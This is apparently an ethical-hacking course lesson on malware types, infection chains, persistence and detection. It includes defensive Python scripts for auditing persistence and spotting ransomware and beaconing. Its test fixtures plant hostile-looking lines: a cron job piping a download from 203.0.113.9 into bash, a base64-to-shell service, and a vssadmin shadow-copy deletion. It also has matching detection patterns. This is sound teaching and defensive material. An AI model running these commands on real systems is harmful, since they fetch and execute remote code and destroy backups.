Ethical Hacking Lesson 28 – Malware Concepts | Dataplexa
System & Network Attacks · Lesson 28

Malware Concepts

Understanding malware is not the same as writing it. This lesson covers how malware actually works — its categories, infection chains, persistence tricks, and how defenders detect each type. The knowledge runs both ways: understanding attacks is how you assess whether a client's defences would survive one.

Why pen testers need to understand malware deeply

Clients do not just want vulnerabilities found — they want to know whether their defences would catch a real attack. Answering that question requires understanding what those attacks actually do. A pen tester who knows how a RAT establishes persistence can check whether the client's EDR monitors the specific registry key it creates. One who understands ransomware encryption can evaluate whether the backup strategy would survive an actual infection.

The knowledge is defensive as much as offensive. Most organisations over-invest in perimeter security and under-invest in understanding what happens after the perimeter fails — which it will, eventually. That post-breach understanding is where malware knowledge pays the most.

Malware categories — what each type actually does

Virus — infects files, spreads on execution

Requires user action

A virus attaches itself to a legitimate file. When that file is opened or shared, the virus executes and attempts to infect other files on the system or network. Classic viruses required human action to spread: opening the infected document or running the infected program. Modern antivirus still leans heavily on signatures, in two forms: a hash of the whole file, and byte-sequence patterns matched inside it. The limitation is obvious for hashes, which change if a single byte changes; pattern signatures survive small edits elsewhere in the file but fail as soon as the matched bytes are altered, packed or encrypted.

Detection signal: Static hash or byte-pattern match against a known signature database. Bypassed by repacking, encrypting or otherwise altering the matched bytes of the payload.

Worm — self-propagates without user interaction

No click required

Worms spread automatically across networks by exploiting service vulnerabilities, with no human action required. WannaCry in May 2017 reached over 200,000 systems across 150 countries in roughly 72 hours by exploiting an SMBv1 flaw that Microsoft had patched two months earlier in MS17-010, using EternalBlue, an exploit the NSA had developed and used quietly until the Shadow Brokers leaked it in April 2017. The NHS was crippled. Factories stopped. The damage ran into billions. What made it so devastating was the combination of a reliable exploit, self-propagation and a large unpatched population: defenders had very little time between initial infection and widespread network compromise.

Detection signal: Mass outbound SMB connection attempts, anomalous lateral movement, rapid file encryption on network shares.

Remote Access Trojan — full remote control

Silent persistent access

A RAT establishes an encrypted channel to the attacker's command-and-control infrastructure. Through it, the attacker can execute arbitrary commands, capture keystrokes, screenshot the desktop, activate the webcam, and pivot to other systems, all over what looks like normal HTTPS traffic. The communication pattern that gives RATs away is beaconing: the implant checks in with its C2 server at regular intervals regardless of whether it has anything to report. A process making an HTTPS connection to an unknown domain every 60 seconds, consistently, is a detection signal that SIEM rules and network analysis tools are specifically tuned to catch. Mature implants randomise the interval (jitter) to blunt this, so good detections measure how tightly the gaps cluster around a period rather than looking for an exact one.

Detection signal: Regular outbound connections at fixed intervals to unusual external hosts, encrypted traffic to non-standard ports.

Ransomware — encrypts then extorts

Double extortion now standard

Ransomware encrypts the victim's files, typically with a fast symmetric cipher using per-file or per-victim keys that are themselves encrypted with the attacker's public key, so the key needed to decrypt never exists in recoverable form on the victim's machine, and demands payment for it. Modern ransomware groups are not opportunistic; they are deliberate. Attackers spend weeks inside a network, mapping infrastructure, escalating privileges, and exfiltrating data before triggering the encryption. The exfiltration is the piece that makes a solid backup strategy insufficient on its own. Even if the victim can restore from backup, the attackers hold the stolen data and will publish it if the ransom is not paid. This double extortion model became standard after 2019 and fundamentally changed the risk calculus around ransomware preparedness.

Detection signal: Mass file rename events, high disk write activity, shadow copy deletion (typically via vssadmin or wmic), large outbound data transfers before encryption begins.

Rootkit — hides everything from the OS

Most difficult to detect

A rootkit modifies the operating system at a deep level, hooking system calls or kernel functions, or editing kernel data structures directly, so that processes, files, registry keys, and network connections are hidden from any tool that asks the OS about them. Running ps, netstat, or a file browser on a rootkit-infected system returns results that do not reflect reality. The OS is lying because the rootkit sits between the true system state and the interfaces that report it. This is why incident response on suspected rootkit infections requires booting from trusted external media or analysing a memory image from outside: you cannot trust the compromised OS to accurately describe its own state.

Detection signal: Discrepancy between OS-reported state and external monitoring. Memory forensics required for accurate analysis.

How malware gets in — the infection chain

The technical sophistication of the payload rarely matters as much as the delivery mechanism. Most infections begin with a user clicking something they should not — or with a trusted software update quietly compromised before it reached them.

INFECTION MECHANISMS — how malware achieves initial access

Phishing email
Real-world example: The 2016 DNC breach began with a single spear-phishing email to John Podesta, styled as a Google security alert. An aide judged it legitimate and the link was clicked. Phishing consistently ranks among the top initial access vectors in breach reports.
Primary defence: Email filtering, MFA on exposed accounts, user training

Supply chain
Real-world example: SolarWinds 2020. Attackers compromised the Orion build pipeline so that a backdoored update went out to up to 18,000 organisations, all of whom trusted it because it was validly signed by the legitimate vendor. Bypassed every perimeter control.
Primary defence: Build-pipeline integrity, vendor vetting, egress monitoring (the update was correctly signed, so signature checks alone did not help)

Public service exploit
Real-world example: Pulse Secure VPN vulnerabilities in 2021 were exploited by state-sponsored groups before most organisations patched. No user interaction required, just an unpatched internet-facing service.
Primary defence: Patching, attack surface reduction

Drive-by download
Real-world example: Visiting a compromised website triggers a browser exploit that automatically downloads and executes malware. No user action beyond loading the page. Requires an unpatched browser or plugin.
Primary defence: Browser patching, script blocking

Removable media
Real-world example: Stuxnet, among the most sophisticated malware ever publicly documented, spread via USB to reach air-gapped Iranian centrifuge control systems. The USB was the only bridge across the air gap.
Primary defence: USB policy enforcement

The SolarWinds attack is worth sitting with. It demonstrated that an organisation can do everything technically right — patch promptly, run EDR, monitor traffic — and still be comprehensively compromised through a trusted vendor relationship. The attack surface is not bounded by your own infrastructure. It extends to every piece of third-party software you install and trust. That is a deeply uncomfortable reality for anyone responsible for securing an enterprise, and it has permanently changed how vendor risk is assessed in security programmes.

Persistence — surviving reboots and security scans

Getting code running once is only the start. Malware needs to survive reboots and avoid being cleaned by security tools. The persistence mechanisms attackers use are exactly the locations pen testers enumerate during escalation — the knowledge works in both directions.

Registry autoruns

HKCU\...\CurrentVersion\Run

Most common Windows persistence location. Runs at every login of that user. No elevated privileges required for the HKCU key; any standard user can write to it, whereas the HKLM equivalent runs for every user but needs administrator rights. Easily enumerated by Sysinternals Autoruns but frequently missed in manual review because administrators rarely audit these keys proactively.

Scheduled tasks and cron

schtasks /create — crontab -e

Scheduled tasks can be hidden from the Task Scheduler GUI and from schtasks /query by tampering with the task's registry entries under the TaskCache key, for example deleting its security descriptor value, a technique seen in real intrusions. On Linux, cron entries in less obvious locations (/etc/cron.d, per-user spool files, systemd timers) go unnoticed for months on systems without active monitoring. Both are highly reliable persistence mechanisms that survive most remediation attempts if the entry itself is not found.

Service installation

sc create — systemctl enable

Registers the malware as an OS service that starts at boot and can restart automatically on failure. Installing a system service requires elevated privileges (administrator on Windows, root for system-wide systemd units), making it a common post-escalation step; per-user systemd units need no privileges but only start when that user logs in. The OS itself maintains the persistence, and a cursory service audit will not catch a convincingly named malicious service.

DLL hijacking

Writable directory in DLL search path

A malicious DLL placed in a directory that a legitimate application searches before the real DLL's location, or named for a DLL the application requests but that does not exist anywhere (a phantom DLL). Every time the application loads, including at startup, it loads the malicious DLL. Highly stealthy: the process appears entirely legitimate to monitoring tools because it is legitimate; the DLL is the only malicious component. The tell is in module-load telemetry: a signed process loading an unsigned DLL from a user-writable directory.

Advanced persistent threat actors — the type behind SolarWinds and Stuxnet — often use multiple persistence mechanisms simultaneously. Remove one and three others remain. This is why incident response professionals talk about complete reimaging rather than malware removal. On a sophisticated infection, you cannot trust that any individual persistence mechanism found was the only one installed.
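The locations above are exactly what an auditor enumerates. On Windows, Sysinternals Autoruns covers Run keys, scheduled tasks and services in one pass. For the Linux equivalents mentioned under scheduled tasks and services, the following is an added example, not a tool the lesson describes: a Python script that walks cron and systemd locations under a filesystem root (pass / on a live host, or the mount point of a disk image) and flags commands that reference world-writable or hidden paths, pipe a download into a shell, or decode inline base64. The locations, the heuristics and the constructed fixture it ships with are assumptions; systemd timers and user-level units are left out for brevity.

```python
"""Audit Linux cron and systemd persistence under an offline filesystem root.
Added example for this lesson, not a tool the page describes. Pass "/" for a live
host or the mount point of a disk image. Locations and heuristics are assumptions."""
import os
import re
import tempfile

# Relative locations to inspect. System crontabs carry a user field; user spools do not.
SYSTEM_CRON = ["etc/crontab", "etc/cron.d"]
USER_CRON = ["var/spool/cron/crontabs", "var/spool/cron"]
UNIT_DIRS = ["etc/systemd/system"]

# Illustrative heuristics: executables in world-writable or hidden home paths,
# a download piped into a shell, inline base64 decoding. Tune before real use.
RULES = {
    "writable-or-hidden-path": re.compile(
        r"(^|[\s=:'\"])(/tmp|/dev/shm|/var/tmp|/home/[^/\s]+/\.[^/\s]+)/"),
    "download-and-exec": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode)\b"),
}

def _cron_jobs(path, has_user):
    """Yield (location, command) for each job line of one crontab file."""
    with open(path, errors="replace") as fh:
        for n, raw in enumerate(fh, 1):
            line = raw.strip()
            if not line or line.startswith("#") or re.match(r"^\w+=", line):
                continue                     # blank, comment or VAR=value line
            fields = line.split()
            skip = (1 if fields[0].startswith("@") else 5) + (1 if has_user else 0)
            if len(fields) > skip:
                yield f"{path}:{n}", " ".join(fields[skip:])

def _unit_execs(path):
    """Yield (location, command) for ExecStart* lines of a systemd unit file."""
    with open(path, errors="replace") as fh:
        for n, raw in enumerate(fh, 1):
            m = re.match(r"^\s*ExecStart(Pre|Post)?\s*=\s*[-@+!:]*\s*(.+)$", raw)
            if m:
                yield f"{path}:{n}", m.group(2).strip()

def _files(root, rel):
    """Yield the file at root/rel, or the regular files directly inside it."""
    p = os.path.join(root, rel)
    if os.path.isfile(p):
        yield p
    elif os.path.isdir(p):
        for name in sorted(os.listdir(p)):
            if os.path.isfile(os.path.join(p, name)):
                yield os.path.join(p, name)

def scheduled_commands(root):
    """Return [(location, command)] for every cron job and ExecStart under root."""
    out = []
    for rel in SYSTEM_CRON:
        for f in _files(root, rel):
            out.extend(_cron_jobs(f, has_user=True))
    for rel in USER_CRON:
        for f in _files(root, rel):
            out.extend(_cron_jobs(f, has_user=False))
    for rel in UNIT_DIRS:
        for f in _files(root, rel):
            if f.endswith(".service"):
                out.extend(_unit_execs(f))
    return out

def audit(root):
    """Return [(location, command, [matched rule names])] for suspicious entries."""
    findings = []
    for loc, cmd in scheduled_commands(root):
        hits = [name for name, rx in RULES.items() if rx.search(cmd)]
        if hits:
            findings.append((loc, cmd, hits))
    return findings

def build_demo_root(root=None):
    """Write a constructed fixture (two benign, three planted entries); return its root."""
    root = root or tempfile.mkdtemp(prefix="persist-demo-")
    files = {
        "etc/crontab": "SHELL=/bin/sh\nPATH=/usr/sbin:/usr/bin:/sbin:/bin\n"
                       "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
                       "*/5 * * * * root /dev/shm/.cache/agent --quiet\n",
        "var/spool/cron/crontabs/ann": "@reboot curl -s http://203.0.113.9/u.sh | bash\n",
        "etc/systemd/system/sshd.service": "[Service]\nExecStart=/usr/sbin/sshd -D $SSHD_OPTS\n",
        "etc/systemd/system/update-helper.service":
            "[Service]\nExecStart=/bin/sh -c 'echo aWQ= | base64 -d | sh'\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for loc, cmd, why in audit(build_demo_root()):
        print(f"{loc}\n    {cmd}\n    -> {', '.join(why)}")
```

Run with no arguments it audits the fixture. In practice the interesting output is every command scheduled_commands returns, not only the flagged ones: a convincingly named job pointing at a binary in /usr/local/bin passes any keyword heuristic, and only a human comparing the list against a known-good baseline will notice it.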

Detection layers — what defenders actually use

Signature-based detection — antivirus

Compares file hashes and byte sequences against known malware signatures. Fast and effective against commodity threats. Defeated by anything that alters the matched bytes: a single-byte change breaks a hash signature, and packing, encryption and polymorphism defeat byte-pattern signatures. Attackers have been bypassing antivirus this way for decades. It remains necessary because it automatically catches the vast majority of low-skill commodity threats without human review.

Blind spot: Novel malware, obfuscated payloads, living-off-the-land attacks using legitimate system binaries.

Behavioural analysis — EDR

Endpoint Detection and Response tools monitor what processes actually do — what files they read and write, what network connections they open, what registry keys they modify, what child processes they spawn. Catches malware that evades signatures by identifying malicious behaviour patterns regardless of the specific code. A process that reads every file in a directory and renames them all with a new extension — regardless of what the process itself is named — is exhibiting ransomware behaviour.

Blind spot: Alert fatigue from false positives. Sophisticated attackers mimic legitimate behaviour patterns to blend into normal activity.
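The rename pattern described above, together with the shadow copy deletion listed under the ransomware detection signals, can be written down as rules over file and process events. The following is an added example, not code from the lesson or from any EDR product: a Python script that flags a process renaming many files to one new extension across several folders inside a short window, and correlates that with the same process spawning a child that deletes Volume Shadow Copies. The event format, the thresholds and the constructed telemetry are assumptions.

```python
"""Behavioural ransomware indicators over EDR-style file and process telemetry.
Added example for this lesson, not code from any EDR product: a burst of renames
that give files one new extension, plus shadow-copy deletion by the same process.
Event format and thresholds are assumptions chosen for illustration."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import os

# Event line: "<iso-ts> <pid> <image> RENAME <old-path> <new-path>"
#          or "<iso-ts> <pid> <image> PROC_CREATE <child command line>"
def parse(line):
    ts, pid, image, op, rest = line.split(maxsplit=4)
    return datetime.fromisoformat(ts), int(pid), image, op, rest

def rename_burst(events, window_s=60, min_renames=30, min_dirs=2):
    """Flag processes that, within a sliding window, rename >= min_renames files to
    one new extension they did not have before, spread over >= min_dirs folders."""
    recent = defaultdict(deque)             # pid -> (ts, folder, new_ext) in window
    flagged = {}
    for ts, pid, image, op, rest in map(parse, events):
        if op != "RENAME":
            continue
        old, new = rest.split()
        old_ext, new_ext = os.path.splitext(old)[1].lower(), os.path.splitext(new)[1].lower()
        if old_ext == new_ext:
            continue                        # ordinary rename: extension kept
        q = recent[pid]
        q.append((ts, os.path.dirname(new), new_ext))
        while (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()                     # drop renames older than the window
        exts = {e for _, _, e in q}
        dirs = {d for _, d, _ in q}
        if len(q) >= min_renames and len(exts) == 1 and len(dirs) >= min_dirs:
            flagged[pid] = (image, len(q), exts.pop())
    return flagged

# Token sets whose joint presence in a command line indicates recovery sabotage.
SHADOW_DELETE = (("vssadmin", "delete", "shadows"),
                 ("wmic", "shadowcopy", "delete"),
                 ("wbadmin", "delete", "catalog"))

def shadow_copy_tampering(events):
    """Return [(pid, image, command line)] where a process spawned a backup-wiping child."""
    hits = []
    for _, pid, image, op, rest in map(parse, events):
        tokens = rest.lower().replace(".exe", "").split()
        if op == "PROC_CREATE" and any(all(t in tokens for t in sig) for sig in SHADOW_DELETE):
            hits.append((pid, image, rest))
    return hits

def triage(events):
    """Per flagged process: rename evidence plus whether it also wiped shadow copies."""
    tampered = {pid for pid, _, _ in shadow_copy_tampering(events)}
    return {pid: {"image": img, "renames": n, "new_ext": ext, "shadow_delete": pid in tampered}
            for pid, (img, n, ext) in rename_burst(events).items()}

def _build_sample_events():
    """Constructed telemetry, not a real incident: a Word save, a photo batch-rename,
    and an unknown binary that wipes shadow copies then re-extensions 60 files."""
    base = datetime(2024, 3, 1, 14, 2, 0)
    ev = [f"{base.isoformat()} 3020 WINWORD.EXE RENAME "
          "C:/Users/ann/Documents/~WRD0001.tmp C:/Users/ann/Documents/report.docx"]
    for i in range(40):                     # explorer.exe: extension unchanged
        t = base + timedelta(seconds=i)
        ev.append(f"{t.isoformat()} 1200 explorer.exe RENAME "
                  f"C:/Users/ann/Pictures/IMG_{i:04}.jpg C:/Users/ann/Pictures/italy_{i:04}.jpg")
    t = base + timedelta(seconds=5)
    ev.append(f"{t.isoformat()} 4412 updater.exe PROC_CREATE vssadmin.exe delete shadows /all /quiet")
    for i in range(60):                     # updater.exe: 60 files -> .locked in 18 s
        t = base + timedelta(seconds=6 + i * 0.3)
        folder, ext = ["Documents", "Pictures", "Desktop"][i % 3], ["docx", "xlsx", "pdf"][i % 3]
        ev.append(f"{t.isoformat()} 4412 updater.exe RENAME "
                  f"C:/Users/ann/{folder}/file{i}.{ext} C:/Users/ann/{folder}/file{i}.{ext}.locked")
    return sorted(ev)

SAMPLE_EVENTS = _build_sample_events()

if __name__ == "__main__":
    for pid, info in triage(SAMPLE_EVENTS).items():
        print(pid, info)
```

The extension-change test is what separates ransomware from a user batch-renaming photos in Explorer, and the multi-folder test from a single application rewriting its own cache; both are common false positives in naive rename-count rules. The shadow copy correlation is what turns a medium-confidence alert into one worth isolating the host over.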

Network traffic analysis

Monitors outbound connections for C2 beaconing patterns, encrypted connections to unusual destinations, DNS requests for algorithmically generated domain names, and large data transfers indicating exfiltration. Many RATs and ransomware variants have distinctive network signatures even when their payload is fully obfuscated on disk. A process beaconing to the same external IP roughly every 30 seconds will eventually surface in a well-tuned network monitoring tool, jitter or not, because the intervals still cluster around one value.

Blind spot: The payload of TLS traffic on port 443 is opaque without interception, which carries privacy and performance costs; without it, defenders are limited to metadata such as SNI, certificate details, client fingerprints (JA3/JA4) and timing.
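Beaconing came up twice, under the RAT section and here. The following is an added example, not code from the lesson or from any SIEM or NDR product: a Python script that takes connection records, groups them by source, destination and port, and scores each flow by how regular its inter-connection gaps are (median gap, and median absolute deviation divided by the median). A timer with 10 percent jitter still scores close to zero; human browsing does not. The record format, the constructed sample traffic and the thresholds are assumptions.

```python
"""Beacon detection over connection logs by inter-arrival regularity.
Added example for this lesson, not code from any SIEM or NDR product. Groups
connection records per (source, destination, port) and flags flows whose gaps
cluster tightly around one interval, which is what an implant's check-in timer
produces even with jitter applied. Log format and thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta
import random
import statistics

def _build_sample_log():
    """Constructed records ("<iso-ts> <src> <dst> <dport>"), not real traffic."""
    random.seed(7)
    base = datetime(2024, 3, 1, 9, 0, 0)
    lines = []
    t = base                                # implant on ws-17: 60 s +/- 10 % jitter
    for _ in range(40):
        lines.append(f"{t.isoformat()} ws-17 203.0.113.45 443")
        t += timedelta(seconds=60 * random.uniform(0.9, 1.1))
    t = base                                # human browsing on ws-22: bursts and gaps
    for _ in range(40):
        lines.append(f"{t.isoformat()} ws-22 198.51.100.10 443")
        t += timedelta(seconds=random.choice([1, 2, 3, 5, 90, 600, 1800]))
    return sorted(lines)

SAMPLE_LOG = _build_sample_log()

def group_flows(lines):
    """Map (src, dst, dport) -> sorted connection timestamps."""
    flows = defaultdict(list)
    for line in lines:
        ts, src, dst, port = line.split()
        flows[(src, dst, int(port))].append(datetime.fromisoformat(ts))
    return {k: sorted(v) for k, v in flows.items()}

def beacon_score(times):
    """Return (median gap in seconds, jitter) where jitter = MAD / median.
    A fixed timer gives jitter near 0; +/-10 % uniform jitter gives about 0.05;
    human traffic is typically far above 0.5."""
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    med = statistics.median(gaps)
    mad = statistics.median(abs(g - med) for g in gaps)
    return med, (mad / med if med > 0 else float("inf"))

def find_beacons(lines, min_conns=20, max_jitter=0.2, min_interval=5, max_interval=3600):
    """Return [(flow, median_gap, jitter)] for flows that look like check-in timers."""
    hits = []
    for flow, times in group_flows(lines).items():
        if len(times) < min_conns:
            continue
        med, jitter = beacon_score(times)
        if min_interval <= med <= max_interval and jitter <= max_jitter:
            hits.append((flow, round(med, 1), round(jitter, 3)))
    return hits

if __name__ == "__main__":
    for flow, med, jitter in find_beacons(SAMPLE_LOG):
        print(f"{flow[0]} -> {flow[1]}:{flow[2]}  median gap {med}s  jitter {jitter}")
```

Real deployments run this over Zeek conn.log or firewall exports and add bytes-out variance, destination rarity and TLS client fingerprinting to cut false positives, because legitimate pollers (NTP, update checkers, monitoring agents) beacon just as regularly as an implant does.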

SIEM — correlated log analysis

Centralised collection and correlation of logs from endpoints, firewalls, Active Directory, cloud services, and applications. Identifies attack patterns across the full environment that no single endpoint tool would see: lateral movement from one host to another, credential abuse across multiple systems, privilege escalation followed immediately by data access. Mandiant's annual M-Trends report has tracked global median attacker dwell time falling from well over a year a decade ago to a few weeks and, in recent editions, to days; even days is ample time to move laterally and stage data for exfiltration. SIEM is the primary tool for reducing that window by correlating signals that individually look innocuous but together reveal a campaign.

Blind spot: Only as good as what is actually being logged. Log gaps are the most common weakness in real SIEM deployments.

No single layer catches everything. The correct framing is not "we have four security tools therefore we are protected" — it is "we have four layers and sophisticated attackers will evade some of them. Our goal is reducing the time between infection and detection." Every day shaved off attacker dwell time limits the damage. Every log gap extended is an opportunity for an attacker to operate undetected.

MITRE ATT&CK — the common language for malware techniques

MITRE ATT&CK is a publicly maintained knowledge base of attacker techniques, organised by tactic and technique, built from documented real-world intrusions. It catalogues the persistence mechanisms, evasion techniques, lateral movement methods, and exfiltration approaches observed in actual attacks, and is updated in regular versioned releases as new techniques surface from incident response investigations and threat intelligence reporting.

For pen testers, ATT&CK serves as both a comprehensive testing checklist and a reporting language. A report that cites T1547.001 — Registry Run Keys persistence — is more useful to a security team than one that vaguely references "registry-based persistence." The specific technique ID maps directly to the detection rules the security team should have in place and makes remediation prioritisation much cleaner.

For defenders, ATT&CK maps to detection engineering. A SOC that has written detection rules covering each ATT&CK technique relevant to their threat model is in a fundamentally stronger position than one running commercial tools without understanding what each covers. The framework is free at attack.mitre.org and is one of the most valuable resources in the field regardless of whether you sit on the offensive or defensive side.

Teacher's Note: If malware analysis interests you as a specialisation, running samples in an isolated sandbox is the fastest way to build intuition. Any.run and Joe Sandbox both offer free tiers: submit a sample, watch it execute, read the behaviour report. Two caveats: free-tier submissions are generally visible to other users, so never upload anything belonging to a client, and never detonate a sample on a machine connected to a network you care about. You will learn more from thirty minutes of that than from hours of reading about malware in the abstract.

Quiz

Scenario:

A threat actor deploys a custom RAT whose hash does not match any antivirus signature. The code is obfuscated and uses a legitimate Windows binary for execution. Traditional antivirus does not flag it. The organisation's EDR alerts within minutes. Which detection method does EDR use that antivirus alone cannot?

Scenario:

A CISO argues their offline backup strategy makes ransomware non-critical — they would restore and refuse to pay. A pen tester pushes back. What aspect of modern ransomware makes backup strategy alone insufficient?

Scenario:

Attackers compromised SolarWinds' build pipeline and inserted malicious code into the Orion update before it was signed and distributed. 18,000 organisations installed it through their normal update process. What infection mechanism does this represent?

Up Next · Lesson 29

Backdoors & Trojans

How backdoors are planted and maintained during an engagement, how trojans deliver payloads, and how defenders detect and respond to both.